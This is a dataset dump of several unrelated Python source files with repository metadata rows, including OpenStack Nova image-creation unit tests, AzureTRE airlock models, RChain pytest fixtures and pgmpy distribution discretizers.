response = self.controller._action_create_image(req, FAKE_UUID,
body=body)
self.assertIsInstance(response, dict)
self.assertEqual('123', response['image_id'])
def test_create_image_name_too_long(self):
long_name = 'a' * 260
body = {
'createImage': {
'name': long_name,
},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image, self.req,
FAKE_UUID, body=body)
def _do_test_create_volume_backed_image(
self, extra_properties, mock_vol_create_side_effect=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_properties:
body['createImage']['metadata'] = extra_properties
image_service = glance.get_default_image_service()
bdm = [dict(volume_id=_fake_id('a'),
volume_size=1,
device_name='vda',
delete_on_termination=False)]
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stub_out('nova.db.api.block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
system_metadata = dict(image_kernel_id=_fake_id('b'),
image_ramdisk_id=_fake_id('c'),
image_root_device_name='/dev/vda',
image_block_device_mapping=str(bdm),
image_container_format='ami')
instance = fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
image_ref=uuids.fake,
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda',
system_metadata=system_metadata)
self.stub_out('nova.compute.api.API.get', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
with test.nested(
mock.patch.object(
self.controller.compute_api.volume_api, 'get_absolute_limits',
return_value={'totalSnapshotsUsed': 0,
'maxTotalSnapshots': 10}),
mock.patch.object(self.controller.compute_api.compute_rpcapi,
'quiesce_instance',
side_effect=exception.InstanceQuiesceNotSupported(
instance_id='fake', reason='test')),
mock.patch.object(self.controller.compute_api.volume_api, 'get',
return_value=volume),
mock.patch.object(self.controller.compute_api.volume_api,
'create_snapshot_force',
return_value=snapshot),
) as (mock_get_limits, mock_quiesce, mock_vol_get, mock_vol_create):
if mock_vol_create_side_effect:
mock_vol_create.side_effect = mock_vol_create_side_effect
response = self.controller._action_create_image(self.req,
FAKE_UUID, body=body)
location = response.headers['Location']
image_id = location.replace(self.image_url or
self.image_api.generate_image_url('', self.context),
'')
image = image_service.show(None, image_id)
self.assertEqual(image['name'], 'snapshot_of_volume_backed')
properties = image['properties']
self.assertEqual(properties['kernel_id'], _fake_id('b'))
self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
self.assertEqual(properties['root_device_name'], '/dev/vda')
self.assertTrue(properties['bdm_v2'])
bdms = properties['block_device_mapping']
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['boot_index'], 0)
self.assertEqual(bdms[0]['source_type'], 'snapshot')
self.assertEqual(bdms[0]['destination_type'], 'volume')
self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
self.assertEqual('/dev/vda', bdms[0]['device_name'])
for fld in ('connection_info', 'id', 'instance_uuid'):
self.assertNotIn(fld, bdms[0])
for k in extra_properties.keys():
self.assertEqual(properties[k], extra_properties[k])
mock_quiesce.assert_called_once_with(mock.ANY, mock.ANY)
mock_vol_get.assert_called_once_with(mock.ANY, volume['id'])
mock_vol_create.assert_called_once_with(mock.ANY, volume['id'],
mock.ANY, mock.ANY)
def test_create_volume_backed_image_no_metadata(self):
self._do_test_create_volume_backed_image({})
def test_create_volume_backed_image_with_metadata(self):
self._do_test_create_volume_backed_image(dict(ImageType='Gold',
ImageVersion='2.0'))
def test_create_volume_backed_image_cinder_over_quota(self):
self.assertRaises(
webob.exc.HTTPForbidden,
self._do_test_create_volume_backed_image, {},
mock_vol_create_side_effect=exception.OverQuota(
overs='snapshot'))
def _test_create_volume_backed_image_with_metadata_from_volume(
self, extra_metadata=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_metadata:
body['createImage']['metadata'] = extra_metadata
image_service = glance.get_default_image_service()
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stub_out('nova.db.api.block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='',
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda',
system_metadata={'image_test_key1': 'test_value1',
'image_test_key2': 'test_value2'})
self.stub_out('nova.compute.api.API.get', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
with test.nested(
mock.patch.object(
self.controller.compute_api.volume_api, 'get_absolute_limits',
return_value={'totalSnapshotsUsed': 0,
'maxTotalSnapshots': 10}),
mock.patch.object(self.controller.compute_api.compute_rpcapi,
'quiesce_instance',
side_effect=exception.InstanceQuiesceNotSupported(
instance_id='fake', reason='test')),
mock.patch.object(self.controller.compute_api.volume_api, 'get',
return_value=volume),
mock.patch.object(self.controller.compute_api.volume_api,
'create_snapshot_force',
return_value=snapshot),
) as (mock_get_limits, mock_quiesce, mock_vol_get, mock_vol_create):
response = self.controller._action_create_image(self.req,
FAKE_UUID, body=body)
location = response.headers['Location']
image_id = location.replace(self.image_base_url, '')
image = image_service.show(None, image_id)
properties = image['properties']
self.assertEqual(properties['test_key1'], 'test_value1')
self.assertEqual(properties['test_key2'], 'test_value2')
if extra_metadata:
for key, val in extra_metadata.items():
self.assertEqual(properties[key], val)
mock_quiesce.assert_called_once_with(mock.ANY, mock.ANY)
mock_vol_get.assert_called_once_with(mock.ANY, volume['id'])
mock_vol_create.assert_called_once_with(mock.ANY, volume['id'],
mock.ANY, mock.ANY)
def test_create_vol_backed_img_with_meta_from_vol_without_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume()
def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume(
extra_metadata={'a': 'b'})
def test_create_image_with_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {'key': 'asdf'},
},
}
response = self.controller._action_create_image(self.req, FAKE_UUID,
body=body)
location = response.headers['Location']
self.assertEqual(self.image_url + '123' if self.image_url else
self.image_api.generate_image_url('123', self.context), location)
def test_create_image_with_too_much_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {},
},
}
for num in range(CONF.quota.metadata_items + 1):
body['createImage']['metadata']['foo%i' % num] = "bar"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_no_name(self):
body = {
'createImage': {},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_blank_name(self):
body = {
'createImage': {
'name': '',
}
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_bad_metadata(self):
body = {
'createImage': {
'name': 'geoff',
'metadata': 'henry',
},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_raises_conflict_on_invalid_state(self):
def snapshot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.snapshot', snapshot)
body = {
"createImage": {
"name": "test_snapshot",
},
}
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
@mock.patch('nova.objects.Service.get_by_host_and_binary')
@mock.patch('nova.api.openstack.common.'
'instance_has_port_with_resource_request', return_value=True)
def test_resize_with_bandwidth_from_old_compute_not_supported(
self, mock_has_res_req, mock_get_service):
body = dict(resize=dict(flavorRef="http://localhost/3"))
mock_get_service.return_value = objects.Service()
mock_get_service.return_value.version = 38
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
mock_has_res_req.assert_called_once_with(
FAKE_UUID, self.controller.network_api)
mock_get_service.assert_called_once_with(
self.req.environ['nova.context'], 'fake_host', 'nova-compute')
| 40.557222 | 79 | 0.574008 |
4a25a44859dc73e781db02056775a29fbafb5bc4 | 951 | py | Python | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | 1 | 2020-12-17T11:17:56.000Z | 2020-12-17T11:17:56.000Z | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | null | null | null | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | null | null | null | import hypergraph as hg
from hypergraph.genetic import GeneticOperators
@hg.function()
# TODO @hg.decl_tweaks(z=hg.tweak(hg.LogUniform(), name='z'))
def test1(x, y):
return x+y
@hg.aggregator()
def mygraph1():
n1 = {'x': 2, 'y': hg.tweak(hg.LogUniform(), name="y1")}
n2 = {'x': 1, 'y': hg.tweak(hg.LogUniform(), name="y2")}
a = hg.call(test1) << (hg.switch(name="sw1") << [n1, n2])
return [a, hg.tweak(hg.QUniform(high=100)), hg.tweak(hg.LogUniform())]
graph1 = mygraph1()
# create a population from graph's phenotype
genetic = GeneticOperators(graph1)
print(genetic.phenotype)
population = genetic.create_population(3)
print(population[:2])
# crossover two parent to get a new individual
child = genetic.crossover_uniform_multi_parents(population[:2])
print(child)
genetic.mutations(child, prob=0.5)
# apply mutations to an individual
print(child)
# use an individual as graph's tweak
print(hg.run(graph1, tweaks=child))
| 26.416667 | 74 | 0.70347 |
4a25a45cc3eddc2a4d09df8d93216e165a277a4d | 1,457 | py | Python | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null | from enum import Enum
from typing import List
from pydantic import Field
from models.domain.azuretremodel import AzureTREModel
from resources import strings
class AirlockRequestStatus(str, Enum):
"""
Airlock Request status
"""
Draft = strings.AIRLOCK_RESOURCE_STATUS_DRAFT
Submitted = strings.AIRLOCK_RESOURCE_STATUS_SUBMITTED
InReview = strings.AIRLOCK_RESOURCE_STATUS_INREVIEW
Approved = strings.AIRLOCK_RESOURCE_STATUS_APPROVED
Rejected = strings.AIRLOCK_RESOURCE_STATUS_REJECTED
Cancelled = strings.AIRLOCK_RESOURCE_STATUS_CANCELLED
Blocked = strings.AIRLOCK_RESOURCE_STATUS_BLOCKED
class AirlockResourceType(str, Enum):
"""
Type of resource to create
"""
AirlockRequest = strings.AIRLOCK_RESOURCE_TYPE_REQUEST
# TODO Airlock review type - https://github.com/microsoft/AzureTRE/issues/1840
class AirlockResourceHistoryItem(AzureTREModel):
"""
Resource History Item - to preserve history of resource properties
"""
resourceVersion: int
updatedWhen: float
user: dict = {}
previousStatus: AirlockRequestStatus
class AirlockResource(AzureTREModel):
"""
Resource request
"""
id: str = Field(title="Id", description="GUID identifying the resource")
resourceType: AirlockResourceType
resourceVersion: int = 0
user: dict = {}
updatedWhen: float = 0
history: List[AirlockResourceHistoryItem] = []
status: AirlockRequestStatus
| 29.14 | 82 | 0.750172 |
4a25a49d75df98ed5c35ebe0a8a6078050175f60 | 405 | py | Python | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null | """
ASGI config for wolf_chat_proj project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wolf_chat_proj.settings')
application = get_asgi_application()
| 23.823529 | 78 | 0.792593 |
4a25a5a46cd9aefd861616a8c544d9b91f0f9c8c | 668 | py | Python | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys
import _commoncrypto
digest2hex = lambda s: ''.join([hex(ord(x))[2:].zfill(2) for x in s])
def sha224(handler):
ctx = _commoncrypto.SHA224_Init()
while True:
line = handler.readline(1024)
if len(line) == 0: break
_commoncrypto.SHA224_Update(ctx, line)
s = _commoncrypto.SHA224_Final(ctx)
return s
if __name__ == '__main__':
if sys.argv[1:]:
for arg in sys.argv[1:]:
f = open(arg)
s = shaA224(f)
print 'SHA224 (%s) = %s' % (arg, digest2hex(s))
f.close()
else:
f = sys.stdin
s = sha224(f)
print digest2hex(s)
| 23.857143 | 69 | 0.556886 |
4a25a5a7fd9910b4efb69d17ae49240a89a139a2 | 274 | py | Python | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null | numero = int(input('Informe um numero: '))
soma =0
for c in range(1,numero+1):
if numero % c == 0:
soma = soma +1
if soma == 2:
print(' Este numero informado {} é primo'.format(numero))
else:
print(' Este numero informado {}, não é primo'.format(numero)) | 30.444444 | 66 | 0.620438 |
4a25a5fca94695380432534c77527bebbaf79246 | 521 | py | Python | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | null | null | null | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | null | null | null | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | 1 | 2019-06-10T16:19:58.000Z | 2019-06-10T16:19:58.000Z | import gbnet
import pandas as pd
import pickle
rp = gbnet.aux.Reporter()
rp.report("Init")
file_paths = [f"gbnet_{v}.csv" for v in ["ents", "rels", "evid"]]
dfs = [pd.read_csv(fp) for fp in file_paths]
model = gbnet.models.ORNORModel(*dfs, nchains=3)
rp.report("Model loaded")
# rp.report("Init sampling single core")
# model.sample(N=500, thin=1, njobs=1)
# rp.report("done sampling single core")
rp.report("Init sampling multicore")
model.sample(N=500, thin=1, njobs=3)
rp.report("done sampling multicore")
| 24.809524 | 66 | 0.702495 |
4a25a628823d2f8010a135348842d1e5648a469a | 7,751 | py | Python | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | import os
import time
from random import Random
import tempfile
import logging
import contextlib
from collections import defaultdict
from typing import (
Any,
List,
Generator,
Dict,
Optional,
)
import pytest
from _pytest.terminal import TerminalReporter
from _pytest.reports import TestReport
from _pytest.config.argparsing import Parser
import docker as docker_py
from docker.client import DockerClient
from rchain.crypto import PrivateKey
from .common import (
CommandLineOptions,
TestingContext,
)
from .rnode import (
Node,
docker_network_with_started_bootstrap,
)
from .pregenerated_keypairs import PREGENERATED_KEYPAIRS
# Silence unwanted noise in logs produced at the DEBUG level
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('connectionpool.py').setLevel(logging.WARNING)
logging.getLogger('docker.utils.config').setLevel(logging.WARNING)
logging.getLogger('docker.auth').setLevel(logging.WARNING)
def pytest_addoption(parser: Parser) -> None:
parser.addoption("--startup-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for starting a node")
parser.addoption("--converge-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for network converge")
parser.addoption("--receive-timeout", type=int, action="store", default=30, help="timeout in seconds for receiving a single block")
parser.addoption("--command-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for executing a rnode call")
parser.addoption("--mount-dir", action="store", default=None, help="globally accesible directory for mounting between containers")
parser.addoption("--random-seed", type=int, action="store", default=None, help="seed for the random numbers generator used in integration tests")
def pytest_terminal_summary(terminalreporter:TerminalReporter) -> None:
tr = terminalreporter
dlist: Dict[str, List[TestReport]] = defaultdict(list)
for replist in tr.stats.values():
for rep in replist:
if hasattr(rep, "duration"):
dlist[rep.nodeid].append(rep)
if not dlist:
return
tr.write_sep("=", "test durations")
for nodeid, reps in dlist.items():
total_second = sum([rep.duration for rep in reps])
detail_duration = ",".join(["{:<8} {:8.2f}s".format(rep.when, rep.duration) for rep in reps])
tr.write_line("Total: {:8.2f}s, {} {}".format(total_second, detail_duration, nodeid))
@pytest.yield_fixture(scope='session')
def command_line_options(request: Any) -> Generator[CommandLineOptions, None, None]:
startup_timeout = int(request.config.getoption("--startup-timeout"))
converge_timeout = int(request.config.getoption("--converge-timeout"))
receive_timeout = int(request.config.getoption("--receive-timeout"))
command_timeout = int(request.config.getoption("--command-timeout"))
mount_dir = request.config.getoption("--mount-dir")
random_seed = request.config.getoption("--random-seed")
command_line_options = CommandLineOptions(
node_startup_timeout=startup_timeout,
network_converge_timeout=converge_timeout,
receive_timeout=receive_timeout,
command_timeout=command_timeout,
mount_dir=mount_dir,
random_seed=random_seed,
)
yield command_line_options
@contextlib.contextmanager
def temporary_bonds_file(validator_bonds_dict: Dict[PrivateKey, int]) -> Generator[str, None, None]:
(fd, file) = tempfile.mkstemp(prefix="rchain-bonds-file-", suffix=".txt", dir="/tmp")
try:
with os.fdopen(fd, "w") as f:
for private_key, bond in validator_bonds_dict.items():
f.write("{} {}\n".format(private_key.get_public_key().to_hex(), bond))
yield file
finally:
os.unlink(file)
def make_wallets_file_lines(wallet_balance_from_private_key: Dict[PrivateKey, int]) -> List[str]:
result = []
for private_key, token_amount in wallet_balance_from_private_key.items():
line = '{},{},0'.format(private_key.get_public_key().get_eth_address(), token_amount)
result.append(line)
return result
def generate_random_wallet_map(random_generator: Random, wallets_amount:int = 5) -> Dict[PrivateKey, int]:
wallet_balance_from_private_key = {}
for _ in range(wallets_amount):
wallet_balance_from_private_key[PrivateKey.generate()] = random_generator.randint(10, 1000)
return wallet_balance_from_private_key
@contextlib.contextmanager
def temporary_wallets_file(random_generator: Random, wallet_balance_from_private_key: Optional[Dict[PrivateKey, int]]= None) -> Generator[str, None, None]:
if wallet_balance_from_private_key is None:
wallet_balance_from_private_key = generate_random_wallet_map(random_generator)
lines = make_wallets_file_lines(wallet_balance_from_private_key)
(fd, file) = tempfile.mkstemp(prefix="rchain-wallets-file-", suffix=".txt")
try:
with os.fdopen(fd, "w") as f:
f.writelines('{}\n'.format(l) for l in lines)
yield file
finally:
os.unlink(file)
@pytest.yield_fixture(scope='session')
def docker_client() -> Generator[DockerClient, None, None]:
docker_client = docker_py.from_env()
try:
yield docker_client
finally:
docker_client.volumes.prune()
docker_client.networks.prune()
@pytest.yield_fixture(scope='session')
def random_generator(command_line_options: CommandLineOptions) -> Generator[Random, None, None]:
random_seed = time.time() if command_line_options.random_seed is None else command_line_options.random_seed
logging.critical("Using tests random number generator seed: %d", random_seed)
random_generator = Random(random_seed)
yield random_generator
@contextlib.contextmanager
def testing_context(command_line_options: CommandLineOptions, random_generator: Random, docker_client: DockerClient, bootstrap_key: PrivateKey = None, peers_keys: List[PrivateKey] = None, network_peers: int = 2, validator_bonds_dict: Dict[PrivateKey, int] = None) -> Generator[TestingContext, None, None]:
if bootstrap_key is None:
bootstrap_key = PREGENERATED_KEYPAIRS[0]
if peers_keys is None:
peers_keys = PREGENERATED_KEYPAIRS[1:][:network_peers]
if validator_bonds_dict is None:
bonds_file_keys = [bootstrap_key] + peers_keys
validator_bonds_dict = dict()
for private_key in bonds_file_keys:
validator_bonds_dict[private_key] = random_generator.randint(1, 100)
with temporary_bonds_file(validator_bonds_dict) as bonds_file:
context = TestingContext(
bonds_file=bonds_file,
bootstrap_key=bootstrap_key,
peers_keys=peers_keys,
docker=docker_client,
node_startup_timeout=command_line_options.node_startup_timeout,
network_converge_timeout=command_line_options.network_converge_timeout,
receive_timeout=command_line_options.receive_timeout,
command_timeout=command_line_options.command_timeout,
mount_dir=command_line_options.mount_dir,
random_generator=random_generator,
)
yield context
testing_context.__test__ = False # type: ignore
@pytest.yield_fixture(scope='module')
def started_standalone_bootstrap_node(command_line_options: CommandLineOptions, random_generator: Random, docker_client: DockerClient) -> Generator[Node, None, None]:
with testing_context(command_line_options, random_generator, docker_client) as context:
with docker_network_with_started_bootstrap(context=context) as bootstrap_node:
yield bootstrap_node
| 41.897297 | 305 | 0.73268 |
4a25a6b189ea89f851e3c9c72a56301d37585d49 | 8,474 | py | Python | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | null | null | null | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | null | null | null | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | 1 | 2021-11-05T03:27:56.000Z | 2021-11-05T03:27:56.000Z | from __future__ import division
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import integrate
class BaseDiscretizer(ABCMeta):
"""
Base class for the discretizer classes in pgmpy. The discretizer
classes are used to discretize a continuous random variable
distribution into discrete probability masses.
Parameters
----------
factor: A ContinuousNode or a ContinuousFactor object
the continuous node or factor representing the distribution
to be discretized.
low, high: float
the range over which the function will be discretized.
cardinality: int
the number of states required in the discretized output.
Examples
--------
>>> from scipy.stats import norm
>>> from pgmpy.factors.continuous import ContinuousNode
>>> normal = ContinuousNode(norm(0, 1).pdf)
>>> from pgmpy.discretize import BaseDiscretizer
>>> class ChildDiscretizer(BaseDiscretizer):
... def get_discrete_values(self):
... pass
>>> discretizer = ChildDiscretizer(normal, -3, 3, 10)
>>> discretizer.factor
<pgmpy.factors.continuous.ContinuousNode.ContinuousNode object at 0x04C98190>
>>> discretizer.cardinality
10
>>> discretizer.get_labels()
['x=-3.0', 'x=-2.4', 'x=-1.8', 'x=-1.2', 'x=-0.6', 'x=0.0', 'x=0.6', 'x=1.2', 'x=1.8', 'x=2.4']
"""
def __init__(self, factor, low, high, cardinality):
self.factor = factor
self.low = low
self.high = high
self.cardinality = cardinality
@abstractmethod
def get_discrete_values(self):
"""
This method implements the algorithm to discretize the given
continuous distribution.
It must be implemented by all the subclasses of BaseDiscretizer.
Returns
-------
A list of discrete values or a DiscreteFactor object.
"""
pass
def get_labels(self):
"""
Returns a list of strings representing the values about
which the discretization method calculates the probability
masses.
Default value is the points -
[low, low+step, low+2*step, ......... , high-step]
unless the method is overridden by a subclass.
Examples
--------
>>> from pgmpy.factors import ContinuousNode
>>> from pgmpy.discretize import BaseDiscretizer
>>> class ChildDiscretizer(BaseDiscretizer):
... def get_discrete_values(self):
... pass
>>> from scipy.stats import norm
>>> node = ContinuousNode(norm(0).pdf)
>>> child = ChildDiscretizer(node, -5, 5, 20)
>>> chld.get_labels()
['x=-5.0', 'x=-4.5', 'x=-4.0', 'x=-3.5', 'x=-3.0', 'x=-2.5',
'x=-2.0', 'x=-1.5', 'x=-1.0', 'x=-0.5', 'x=0.0', 'x=0.5', 'x=1.0',
'x=1.5', 'x=2.0', 'x=2.5', 'x=3.0', 'x=3.5', 'x=4.0', 'x=4.5']
"""
step = (self.high - self.low) / self.cardinality
labels = [
"x={i}".format(i=str(i))
for i in np.round(np.arange(self.low, self.high, step), 3)
]
return labels
class RoundingDiscretizer(BaseDiscretizer):
"""
This class uses the rounding method for discretizing the
given continuous distribution.
For the rounding method,
The probability mass is,
cdf(x+step/2)-cdf(x), for x = low
cdf(x+step/2)-cdf(x-step/2), for low < x <= high
where, cdf is the cumulative density function of the distribution
and step = (high-low)/cardinality.
Examples
--------
>>> import numpy as np
>>> from pgmpy.factors.continuous import ContinuousNode
>>> from pgmpy.factors.continuous import RoundingDiscretizer
>>> std_normal_pdf = lambda x : np.exp(-x*x/2) / (np.sqrt(2*np.pi))
>>> std_normal = ContinuousNode(std_normal_pdf)
>>> std_normal.discretize(RoundingDiscretizer, low=-3, high=3,
... cardinality=12)
[0.001629865203424451, 0.009244709419989363, 0.027834684208773178,
0.065590616803038182, 0.120977578710013, 0.17466632194020804,
0.19741265136584729, 0.17466632194020937, 0.12097757871001302,
0.065590616803036905, 0.027834684208772664, 0.0092447094199902269]
"""
def get_discrete_values(self):
step = (self.high - self.low) / self.cardinality
# for x=[low]
discrete_values = [
self.factor.cdf(self.low + step / 2) - self.factor.cdf(self.low)
]
# for x=[low+step, low+2*step, ........., high-step]
points = np.linspace(self.low + step, self.high - step, self.cardinality - 1)
discrete_values.extend(
[
self.factor.cdf(i + step / 2) - self.factor.cdf(i - step / 2)
for i in points
]
)
return discrete_values
class UnbiasedDiscretizer(BaseDiscretizer):
"""
This class uses the unbiased method for discretizing the
given continuous distribution.
The unbiased method for discretization is the matching of the
first moment method. It involves calculating the first order
limited moment of the distribution which is done by the _lim_moment
method.
For this method,
The probability mass is,
(E(x) - E(x + step))/step + 1 - cdf(x), for x = low
(2 * E(x) - E(x - step) - E(x + step))/step, for low < x < high
(E(x) - E(x - step))/step - 1 + cdf(x), for x = high
where, E(x) is the first limiting moment of the distribution
about the point x, cdf is the cumulative density function
and step = (high-low)/cardinality.
References
----------
Klugman, S. A., Panjer, H. H. and Willmot, G. E.,
Loss Models, From Data to Decisions, Fourth Edition,
Wiley, section 9.6.5.2 (Method of local moment matching) and
exercise 9.41.
Examples
--------
>>> import numpy as np
>>> from pgmpy.factors import ContinuousNode
>>> from pgmpy.factors.continuous import UnbiasedDiscretizer
# exponential distribution with rate = 2
>>> exp_pdf = lambda x: 2*np.exp(-2*x) if x>=0 else 0
>>> exp_node = ContinuousNode(exp_pdf)
>>> exp_node.discretize(UnbiasedDiscretizer, low=0, high=5, cardinality=10)
[0.39627368905806137, 0.4049838434034298, 0.13331784003148325,
0.043887287876647259, 0.014447413395300212, 0.0047559685431339703,
0.0015656350182896128, 0.00051540201980112557, 0.00016965346326140994,
3.7867260839208328e-05]
"""
def get_discrete_values(self):
lev = self._lim_moment
step = (self.high - self.low) / (self.cardinality - 1)
# for x=[low]
discrete_values = [
(lev(self.low) - lev(self.low + step)) / step
+ 1
- self.factor.cdf(self.low)
]
# for x=[low+step, low+2*step, ........., high-step]
points = np.linspace(self.low + step, self.high - step, self.cardinality - 2)
discrete_values.extend(
[(2 * lev(i) - lev(i - step) - lev(i + step)) / step for i in points]
)
# for x=[high]
discrete_values.append(
(lev(self.high) - lev(self.high - step)) / step
- 1
+ self.factor.cdf(self.high)
)
return discrete_values
def _lim_moment(self, u, order=1):
"""
This method calculates the kth order limiting moment of
the distribution. It is given by -
E(u) = Integral (-inf to u) [ (x^k)*pdf(x) dx ] + (u^k)(1-cdf(u))
where, pdf is the probability density function and cdf is the
cumulative density function of the distribution.
Reference
---------
Klugman, S. A., Panjer, H. H. and Willmot, G. E.,
Loss Models, From Data to Decisions, Fourth Edition,
Wiley, definition 3.5 and equation 3.8.
Parameters
----------
u: float
The point at which the moment is to be calculated.
order: int
The order of the moment, default is first order.
"""
def fun(x):
return np.power(x, order) * self.factor.pdf(x)
return integrate.quad(fun, -np.inf, u)[0] + np.power(u, order) * (
1 - self.factor.cdf(u)
)
def get_labels(self):
labels = list(
"x={i}".format(i=str(i))
for i in np.round(np.linspace(self.low, self.high, self.cardinality), 3)
)
return labels
| 32.592308 | 99 | 0.597829 |
4a25a754bcb7ee057441f2dacb1c8ee698b8f6c4 | 165 | py | Python | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
] | 39 | 2020-04-03T13:52:34.000Z | 2022-03-23T13:08:22.000Z | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
